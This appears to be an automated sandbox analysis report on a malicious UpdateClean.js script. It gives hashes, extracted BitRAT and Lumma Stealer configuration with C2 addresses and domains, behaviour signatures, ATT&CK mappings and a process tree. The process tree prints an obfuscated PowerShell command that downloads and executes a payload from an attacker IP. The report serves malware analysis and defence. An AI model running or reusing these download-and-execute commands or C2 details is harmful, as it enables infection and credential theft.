Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-04-2024 21:57

General

  • Target

    UpdateClean.js

  • Size

    5KB

  • MD5

    d6942e22893e95deea7bbe9d9f9e2a94

  • SHA1

    4d002c2b134d52d0ce8a6715e1ab75b4dd36d4d9

  • SHA256

    b3bdd33dcaf6d7453e5aca839f814ba5754b7b4f5b119890c8f4a16bf149c9ad

  • SHA512

    b1969093839283c68928bd38f8ee0788d85ce71272e18e59316897b223b6d94178464360d7d0e204bd78ea315bfc452607f22a4fbc30686c8439f125124d3b80

  • SSDEEP

    96:rBup4W/ul47KmtSzemZYSBTJABlaxVRo/JR3Ui7RDqG1+qnA++B+k+++8H+e7it5:rBu6W/N+qS1ZjJAixVRo/JR3N7RLr+ru

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://77.221.151.31/a/z.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://77.221.151.31/a/s.png

Extracted

Family

bitrat

Version

1.38

C2

77.221.151.31:4444

Attributes
  • communication_password

    7b13ff385b95cf25d53088d6b7c5d890

  • tor_process

    tor

Extracted

Family

lumma

C2

https://strollheavengwu.shop/api

https://productivelookewr.shop/api

https://tolerateilusidjukl.shop/api

https://shatterbreathepsw.shop/api

https://shortsvelventysjo.shop/api

https://incredibleextedwj.shop/api

https://alcojoldwograpciw.shop/api

https://liabilitynighstjsko.shop/api

https://demonstationfukewko.shop/api

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 39 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\UpdateClean.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3888
        • C:\Windows\system32\attrib.exe
          attrib +h C:\Users\Public\0x.log
          4⤵
          • Views/modifies file attributes
          PID:2176
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:4416
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
            PID:1604
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            3⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2216
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
          2⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:408
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            3⤵
              PID:2828
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:4064

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Modify Registry

          1
          T1112

          Hide Artifacts

          1
          T1564

          Hidden Files and Directories

          1
          T1564.001

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            2f57fde6b33e89a63cf0dfdd6e60a351

            SHA1

            445bf1b07223a04f8a159581a3d37d630273010f

            SHA256

            3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

            SHA512

            42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            9370680d9e75f9273830871b94aff80d

            SHA1

            0af89e92ff564c0bde6e1efa6e4e2d91e6d90fa3

            SHA256

            4300d4dc2ece67f8a9e2c6a70c1b8eedb977c1bdf7a8a5be4e7f7e5afb55d27c

            SHA512

            b4b497f9b7b27b018e94fb6ec6ff6143fcb26a298e82d4146b05402354b2345118955fa0f9160aa56102d413a22a58a102d11748491727e1830e06a686e04af1

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sbhzsdpj.ook.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Public\0x.log
            Filesize

            62KB

            MD5

            d2e9de8671fd61605ff5f8b8f3249d6b

            SHA1

            38dc0accb9c561c4f2ed9cc565f73a09eb84e81c

            SHA256

            fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c

            SHA512

            413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106

          • memory/408-25-0x000002959A950000-0x000002959A95E000-memory.dmp
            Filesize

            56KB

          • memory/408-20-0x0000029598670000-0x0000029598680000-memory.dmp
            Filesize

            64KB

          • memory/408-23-0x0000029598670000-0x0000029598680000-memory.dmp
            Filesize

            64KB

          • memory/408-24-0x0000029598670000-0x0000029598680000-memory.dmp
            Filesize

            64KB

          • memory/408-15-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp
            Filesize

            10.8MB

          • memory/408-0-0x00000295FDE70000-0x00000295FDE92000-memory.dmp
            Filesize

            136KB

          • memory/408-29-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp
            Filesize

            10.8MB

          • memory/1448-47-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp
            Filesize

            10.8MB

          • memory/1448-21-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp
            Filesize

            10.8MB

          • memory/1448-22-0x000001763A050000-0x000001763A060000-memory.dmp
            Filesize

            64KB

          • memory/1448-35-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp
            Filesize

            10.8MB

          • memory/1448-39-0x000001763A050000-0x000001763A060000-memory.dmp
            Filesize

            64KB

          • memory/1448-37-0x000001763A050000-0x000001763A060000-memory.dmp
            Filesize

            64KB

          • memory/1448-38-0x000001763A050000-0x000001763A060000-memory.dmp
            Filesize

            64KB

          • memory/2216-52-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-76-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-105-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-45-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-101-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-46-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-97-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-41-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-48-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-49-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-50-0x0000000074D50000-0x0000000074D89000-memory.dmp
            Filesize

            228KB

          • memory/2216-51-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-93-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-54-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-53-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-55-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-56-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-57-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-58-0x00000000750D0000-0x0000000075109000-memory.dmp
            Filesize

            228KB

          • memory/2216-59-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-60-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-61-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-62-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-64-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-65-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-66-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-67-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-68-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-69-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-70-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-71-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-73-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-74-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-75-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-40-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-77-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-78-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-79-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-81-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-85-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2216-89-0x0000000000400000-0x00000000007D3000-memory.dmp
            Filesize

            3.8MB

          • memory/2828-26-0x0000000000400000-0x000000000044E000-memory.dmp
            Filesize

            312KB

          • memory/2828-32-0x0000000000400000-0x000000000044E000-memory.dmp
            Filesize

            312KB

          • memory/2828-33-0x0000000000400000-0x000000000044E000-memory.dmp
            Filesize

            312KB

          • memory/2828-36-0x0000000000400000-0x000000000044E000-memory.dmp
            Filesize

            312KB